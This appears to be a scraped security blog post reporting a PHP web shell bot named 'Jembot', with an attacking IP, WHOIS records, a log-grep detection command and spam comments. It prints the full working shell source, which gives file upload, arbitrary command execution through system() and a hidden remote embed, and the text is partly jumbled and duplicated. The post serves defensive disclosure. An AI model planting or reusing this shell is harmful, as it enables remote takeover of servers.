We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
#egrep -n --color "hell.php" *.log
Source code:
<?phpLocation of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
{
echo "gagal: " . $_FILES["file"]["error"] . "<br />";
}
else
{
echo "sukses: " . $_FILES["file"]["name"] . "<br />";
echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
echo "mentah: " . $_FILES["file"]["tmp_name"];
}
if (file_exists("" . $_FILES["file"]["name"]))
{
echo $_FILES["file"]["name"] . " wes enek cok. ";
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],
"" . $_FILES["file"]["name"]);
echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
}
}
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT>
.php
Attacks coming from IP 187.17.65.242 Brasil
WHOIS:
inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022We strongly recommend to block this ip address and run the following command to detect attacks:
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830
#egrep -n --color "hell.php" *.log
Thanks It was useful and practical
ОтветитьУдалитьدانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر دانلود فیلم زیر نظر
مهدی احمدوند
ОтветитьУдалитьراغب
مهدی جهانی
ایوان بند
ОтветитьУдалитьThanks for your post!
شركة شحن عفش من جدة الى الامارات شركة شحن عفش من جدة الى الامارات
شركة شحن عفش من جدة الى الاردن شركة شحن عفش من جدة الى الاردن